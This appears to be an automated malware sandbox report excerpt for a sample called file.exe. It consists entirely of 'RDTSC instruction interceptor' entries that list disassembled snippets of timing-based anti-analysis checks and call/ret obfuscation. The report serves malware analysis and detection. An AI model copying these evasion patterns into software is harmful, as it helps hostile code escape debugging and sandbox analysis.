                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B3EF second address: 61B3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B3F5 second address: 61B419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7704DD53B9h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D2B3 second address: 61D2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 xor dword ptr [esp], 4B2BC31Ah 0x0000000c or si, 31C5h 0x00000011 push 722BF0DAh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704E143C8h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D2E3 second address: 61D2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D2E9 second address: 61D2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D6F0 second address: 61D6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D7B8 second address: 61D7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D9D9 second address: 61D9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D9E1 second address: 61D9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DE63 second address: 61DE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DEEB second address: 61DEF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DFA7 second address: 61DFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E087 second address: 61E08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E173 second address: 61E197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E197 second address: 61E19D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E407 second address: 61E419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7704DD53A8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2CB second address: 61F2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7704E143B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2DC second address: 61F2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2E2 second address: 61F2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620DDD second address: 620DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62184F second address: 62186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143C7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62186A second address: 62188B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704DD53B5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62188B second address: 6218F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F7704E143B8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 clc 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D393Dh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F7704E143B8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jmp 00007F7704E143BDh 0x0000004c xor dword ptr [ebp+1245D2E5h], edi 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6218F8 second address: 621903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7704DD53A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6222C7 second address: 62233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 adc edi, 13A1D2B8h 0x0000000f adc edi, 69A1EB46h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F7704E143B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D1CEFh], edi 0x00000037 jnp 00007F7704E143BCh 0x0000003d mov edi, dword ptr [ebp+122D3601h] 0x00000043 xchg eax, ebx 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F7704E143C0h 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d popad 0x0000004e pop edx 0x0000004f push eax 0x00000050 je 00007F7704E143CEh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F7704E143BCh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62233E second address: 622342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62380B second address: 623836 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7704E143B8h 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7704E143C8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623836 second address: 62387B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D1C2Fh] 0x0000000e push 00000000h 0x00000010 movzx esi, cx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F7704DD53A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor edi, 05C37003h 0x00000035 clc 0x00000036 push eax 0x00000037 pushad 0x00000038 je 00007F7704DD53ACh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626F1C second address: 626F34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F7704E143B6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626F34 second address: 626F3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62846A second address: 628478 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 jc 00007F7704E143CAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE17F second address: 5DE183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA37 second address: 62AA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628B46 second address: 628BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F7704DD53A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D29A5h], edi 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov di, ax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, dl 0x0000003b mov eax, dword ptr [ebp+122D00A1h] 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F7704DD53A8h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b push eax 0x0000005c mov dword ptr [ebp+12449208h], edi 0x00000062 pop ebx 0x00000063 mov ebx, 5B74528Fh 0x00000068 push esi 0x00000069 mov ebx, edi 0x0000006b pop edi 0x0000006c push FFFFFFFFh 0x0000006e mov di, 568Fh 0x00000072 nop 0x00000073 pushad 0x00000074 pushad 0x00000075 js 00007F7704DD53A6h 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA3C second address: 62AA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA46 second address: 62AA62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA62 second address: 62AABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7704E143B8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1A27h], ecx 0x00000028 mov edi, dword ptr [ebp+1246AD9Bh] 0x0000002e push 00000000h 0x00000030 jmp 00007F7704E143C4h 0x00000035 push 00000000h 0x00000037 or bx, 2FB5h 0x0000003c push eax 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AABB second address: 62AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C83B second address: 62C856 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7704E143BCh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C856 second address: 62C879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7704DD53AAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C9A3 second address: 62C9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC98 second address: 62FD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F7704DD53B3h 0x0000000b je 00007F7704DD53A6h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7704DD53A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push esi 0x00000031 mov edi, esi 0x00000033 pop edi 0x00000034 mov bl, 6Ch 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F7704DD53A8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jns 00007F7704DD53ABh 0x00000058 push 00000000h 0x0000005a jne 00007F7704DD53A6h 0x00000060 xchg eax, esi 0x00000061 jnp 00007F7704DD53B4h 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c pop edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EF65 second address: 62EF6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FD32 second address: 62FD41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F7704DD53A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFA5 second address: 62FFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFA9 second address: 62FFAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFAF second address: 62FFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E13 second address: 632E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E17 second address: 632E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E1D second address: 632E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633EAB second address: 633EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7704E143B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633EBF second address: 633F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F7704DD53A8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 js 00007F7704DD53BAh 0x0000002b jmp 00007F7704DD53B4h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F7704DD53A8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+12468410h] 0x00000052 push 00000000h 0x00000054 sbb bl, FFFFFFE2h 0x00000057 mov edi, dword ptr [ebp+122D2B95h] 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jns 00007F7704DD53A8h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635F16 second address: 635F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635F1B second address: 635F81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D3205h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F7704DD53A8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov ebx, eax 0x00000031 mov dword ptr [ebp+122D34B1h], eax 0x00000037 push 00000000h 0x00000039 mov ebx, dword ptr [ebp+122D3695h] 0x0000003f mov dword ptr [ebp+12449535h], ebx 0x00000045 xchg eax, esi 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F7704DD53B5h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F2E second address: 632F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F48 second address: 632F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6340FA second address: 6340FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637056 second address: 637066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631F89 second address: 631F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637066 second address: 63706A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631F8F second address: 631FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jne 00007F7704E143B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631FA3 second address: 631FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637329 second address: 637348 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704E143BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F7704E143C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F7704E143B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63907E second address: 639082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6383B3 second address: 6383D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704E143C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639082 second address: 6390E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007F7704DD53AAh 0x0000000f pop ecx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 sub dword ptr [ebp+12470146h], edi 0x0000001e push edi 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov al, 77h 0x00000023 popad 0x00000024 jmp 00007F7704DD53AAh 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+12475076h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F7704DD53A8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov di, si 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63926A second address: 639274 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D81F second address: 63D844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7704DD53A6h 0x0000000a popad 0x0000000b jmp 00007F7704DD53ACh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jns 00007F7704DD53A8h 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642790 second address: 6427DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F7704E143BEh 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F7704E143C3h 0x00000017 jmp 00007F7704E143C4h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007F7704E143B6h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC70 second address: 5DFC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC74 second address: 5DFC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC78 second address: 5DFCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7704DD53B0h 0x0000000e jmp 00007F7704DD53B9h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641FE3 second address: 641FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC737 second address: 5DC73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
